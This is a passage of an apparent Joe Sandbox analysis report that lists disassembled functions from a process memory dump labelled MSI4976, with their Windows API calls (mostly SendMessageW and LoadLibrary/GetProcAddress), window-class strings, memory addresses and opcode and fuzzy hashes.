                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyWindow
                                        • String ID: msctls_updown32
                                        • API String ID: 4014797782-2298589950
                                        • Opcode ID: 205aeebd5a0f945c88e37d8b9898b65f826096dc1163f7b74091272234615016
                                        • Instruction ID: 7deb9d558464ed3c7a269b3a809ec762d4bcfcb08abf24f950871f6e240b009f
                                        • Opcode Fuzzy Hash: 205aeebd5a0f945c88e37d8b9898b65f826096dc1163f7b74091272234615016
                                        • Instruction Fuzzy Hash: A321B2B5600605AFEB12EF64CCC1EA737ACEB4A394F05015AF9019B2A1C770EC11DB61
                                        Function 003897B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0038983D
                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0038984D
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00389872
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$MoveWindow
                                        • String ID: Listbox
                                        • API String ID: 3315199576-2633736733
                                        • Opcode ID: 790503f119fc73aadedf24778b784800dff1fb0bb8145ef7c81180b7908f5b65
                                        • Instruction ID: 7cfce20d17999b634706af6a2050b8575aac4d34205436357c12a92ae95d7d9f
                                        • Opcode Fuzzy Hash: 790503f119fc73aadedf24778b784800dff1fb0bb8145ef7c81180b7908f5b65
                                        • Instruction Fuzzy Hash: C221F632610218BFEF139F54CC85FBB3BAEEF8A754F068165F9059B1A0C6719C518BA0
                                        Function 0035C39D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0035C3BF
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0035C3D6
                                        • SendMessageW.USER32(?,0000000D,?,00000000), ref: 0035C40E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: 98c03277f3f449acf5eca6ded74a1552b441fa82f1155e5084e5da0df67a23c0
                                        • Instruction ID: 8db4acd68ef0011a13543c949d2f3916e38e3b8789edb917b5aff38835886f0c
                                        • Opcode Fuzzy Hash: 98c03277f3f449acf5eca6ded74a1552b441fa82f1155e5084e5da0df67a23c0
                                        • Instruction Fuzzy Hash: 0121CF72610218BFDB16DB99C882DAEB7BEEF44304F211456E805E7160D670AE048AA0
                                        Function 00378D31 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000402,00000000,00000000), ref: 00378D80
                                        • SendMessageW.USER32(0000000C,00000000,?), ref: 00378DC1
                                        • SendMessageW.USER32(0000000C,00000000,?), ref: 00378DE9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: 3feede90baa96e8cea0ead5470dcf6e6ec971245ac380ad2bf70dc11bcc2d56c
                                        • Instruction ID: 23ce029a15110725057a57b369b19ae7721f68a84acab9e2ef851584df54d9db
                                        • Opcode Fuzzy Hash: 3feede90baa96e8cea0ead5470dcf6e6ec971245ac380ad2bf70dc11bcc2d56c
                                        • Instruction Fuzzy Hash: 04213675210511EFD722EB14ED89D6ABBE9FF49310B418551E9099F6B1CB30FC50CB90
                                        Function 0038A217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0038A27B
                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0038A290
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0038A29D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        • Opcode ID: 174224110211c8020850c1588b559aefc16a499991b15cf621fd868bbb07f2e0
                                        • Instruction ID: db74965e67e7ea05a63df73e92cb68b075d67ea8e3bf02338008463f297cae84
                                        • Opcode Fuzzy Hash: 174224110211c8020850c1588b559aefc16a499991b15cf621fd868bbb07f2e0
                                        • Instruction Fuzzy Hash: 6711E371204708BBEB266F65CC46FA73BADEF89B54F024619FA45A60D0D272A851CB60
                                        Function 00389424 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowTextLengthW.USER32(00000000), ref: 003894A6
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003894B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: LengthMessageSendTextWindow
                                        • String ID: @U=u$edit
                                        • API String ID: 2978978980-590756393
                                        • Opcode ID: 330154a96de9dff61994e82bbb3a89a1696061395179f169483007b8c74131bf
                                        • Instruction ID: abfbf9003d7da6d8c8c8fe1f20ba07f7e6fc93fab601b6decdae9a2650f24297
                                        • Opcode Fuzzy Hash: 330154a96de9dff61994e82bbb3a89a1696061395179f169483007b8c74131bf
                                        • Instruction Fuzzy Hash: B811B871100208AFEB12AEA59C80BFB3B6EEB05378F254765F965971E0C2319C529B60
                                        Function 0035C577 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0035C5E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend_memmove
                                        • String ID: @U=u$ComboBox$ListBox
                                        • API String ID: 1456604079-2258501812
                                        • Opcode ID: 266dec85252288a8489515c31b6c0db33456653b525b7a9bc5f834700dd9ae9f
                                        • Instruction ID: eaba50f94ecfc6a95ef8cd3a9d5984aaedee2ec9e2ef7b2bc23e6ae651f8ae8e
                                        • Opcode Fuzzy Hash: 266dec85252288a8489515c31b6c0db33456653b525b7a9bc5f834700dd9ae9f
                                        • Instruction Fuzzy Hash: A801B9716112246FC70AEB94DC51CFE736DAF423117141A15F823A72E1EE34590C9750
                                        Function 0035C473 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 0035C4E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend_memmove
                                        • String ID: @U=u$ComboBox$ListBox
                                        • API String ID: 1456604079-2258501812
                                        • Opcode ID: afcc5468063a28e32a67a25152cf5c84f21b826823e461e93298fda07d594454
                                        • Instruction ID: d9fd1982753b41b818885034ec136ff07831f1854a187e91c52fb2b8b21f9894
                                        • Opcode Fuzzy Hash: afcc5468063a28e32a67a25152cf5c84f21b826823e461e93298fda07d594454
                                        • Instruction Fuzzy Hash: 4301A2B1A512186FCB0BEBA4D962EFF73AD9F15301F141025F903E72E1EA545F0C96A1
                                        Function 0035C4F6 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 0035C562
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend_memmove
                                        • String ID: @U=u$ComboBox$ListBox
                                        • API String ID: 1456604079-2258501812
                                        • Opcode ID: 2809ba25172549b511c511850d395a8ecdc451dc77312b4d98a48cec6e3a5c1d
                                        • Instruction ID: 2ae7047f84c2a1386dbbf00539cc126830c4a653e5727c578088241d5baf69d2
                                        • Opcode Fuzzy Hash: 2809ba25172549b511c511850d395a8ecdc451dc77312b4d98a48cec6e3a5c1d
                                        • Instruction Fuzzy Hash: FE012671A112186BCB07EBA4D902EFF33AC9F12702F141425F803F72E1EA249F0C92A1
                                        Function 0038D784 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32(?,003E1810,00390327,000000FC,?,00000000,00000000,?,?,?,0039F381,?,?,?,?,?), ref: 0038D786
                                        • GetFocus.USER32 ref: 0038D78E
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                          • Part of subcall function 0033B155: GetWindowLongW.USER32(?,000000EB), ref: 0033B166
                                        • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 0038D800
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Long$FocusForegroundMessageSend
                                        • String ID: @U=u
                                        • API String ID: 3601265619-2594219639
                                        • Opcode ID: 60b391a9bdb5a06b7ab6df7a2b058d9026000db996731d9bf2ab2e5f01a05466
                                        • Instruction ID: 0ac72580b74d7e9733ceb0e86eebf6667fb321cdf524474188ea2acbc3b8839d
                                        • Opcode Fuzzy Hash: 60b391a9bdb5a06b7ab6df7a2b058d9026000db996731d9bf2ab2e5f01a05466
                                        • Instruction Fuzzy Hash: 340175716006108FC726DF28EC85AA577EABF8A310F5903A9E4168B3F1DB31AC06CB50
                                        Function 00321A85 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0032193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00321952
                                        • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00321AA1
                                        • GetParent.USER32(?), ref: 00392528
                                        • InvalidateRect.USER32(00000000,?,00321A74,?,00000000,00000001), ref: 0039252F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$InvalidateParentRectTimeout
                                        • String ID: @U=u
                                        • API String ID: 3648793173-2594219639
                                        • Opcode ID: 090546b8fd121670f2bfcbc8ffae455ba833f7e5b1e5ba95e1b570b0397bb2a4
                                        • Instruction ID: c38a985d6a3836e2d8c70a397ee1e71bb1795be2b53b3483ebc5481f172f20dd
                                        • Opcode Fuzzy Hash: 090546b8fd121670f2bfcbc8ffae455ba833f7e5b1e5ba95e1b570b0397bb2a4
                                        • Instruction Fuzzy Hash: 5CF0ED34114264FBEF332F60ED09FA67BACAF32340F114128F9829B4B0C6A29940AB50
                                        Function 00342F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,?,00342F11,00000000), ref: 00342F79
                                        • GetProcAddress.KERNEL32(00000000), ref: 00342F80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RoInitialize$combase.dll
                                        • API String ID: 2574300362-340411864
                                        • Opcode ID: f1cf8b99529421c51d8b27430d6e304b682ca8e48923f1eb566b9acc2b07600a
                                        • Instruction ID: c887dcef1f9683d7635a61c17038620daac3f5ffba2068370a04a0bd1000bf07
                                        • Opcode Fuzzy Hash: f1cf8b99529421c51d8b27430d6e304b682ca8e48923f1eb566b9acc2b07600a
                                        • Instruction Fuzzy Hash: E8E01A74694340AADB635F70ED89B5536ACE701B06F424124F103ED4E0CBF96094DF08
                                        Function 00343034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00342F4E), ref: 0034304E
                                        • GetProcAddress.KERNEL32(00000000), ref: 00343055
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RoUninitialize$combase.dll
                                        • API String ID: 2574300362-2819208100
                                        • Opcode ID: 00ca9805a1c988b7d14eb2016d5608201aa12a254a5c0ae5b9c51fb85ab07ae6
                                        • Instruction ID: 5dac5c2917ce3f0f9b57cc65078790e206f80b0304033c2e4e8e93d918450410
                                        • Opcode Fuzzy Hash: 00ca9805a1c988b7d14eb2016d5608201aa12a254a5c0ae5b9c51fb85ab07ae6
                                        • Instruction Fuzzy Hash: 24E09274645240ABDB375B61EE4DB453AADF705702F100618F10B9E4F0CBB495509B18
                                        Function 0039BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: LocalTime__swprintf
                                        • String ID: %.3d$WIN_XPe
                                        • API String ID: 2070861257-2409531811
                                        • Opcode ID: ecf33ab8a39d344f62e2160f7f7143e2af30ffbe899e5c98bdc5b02289bd13fb
                                        • Instruction ID: adc9f98ad7936575cf1971b130f239cffda9b168d7b24d148a303ce7e8a42456
                                        • Opcode Fuzzy Hash: ecf33ab8a39d344f62e2160f7f7143e2af30ffbe899e5c98bdc5b02289bd13fb
                                        • Instruction Fuzzy Hash: 3DE06271C1812DEBCF57DB90AE46AFAB3BCAB04300F5488D3B91691844D7359B54AB11
                                        Function 003820F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,003820EC,?,0037F751), ref: 00382104
                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00382116
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetProcessId$kernel32.dll
                                        • API String ID: 2574300362-399901964
                                        • Opcode ID: bc6c784e8e443f34f17e8fc012e6e2d01902693b3b70b3d2fab199ec78b388db
                                        • Instruction ID: fdf1955558b331ead57b80c9e887021b2099c28b88067e56b40e0430e5dfbd2b
                                        • Opcode Fuzzy Hash: bc6c784e8e443f34f17e8fc012e6e2d01902693b3b70b3d2fab199ec78b388db
                                        • Instruction Fuzzy Hash: 1DD0A9755103128FD7237FA1F80D6833BE8AB05300F21546AE68BD2698DBB0C880CB60
                                        Function 0033E6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0033E69C,?,0033E43F), ref: 0033E6B4
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0033E6C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
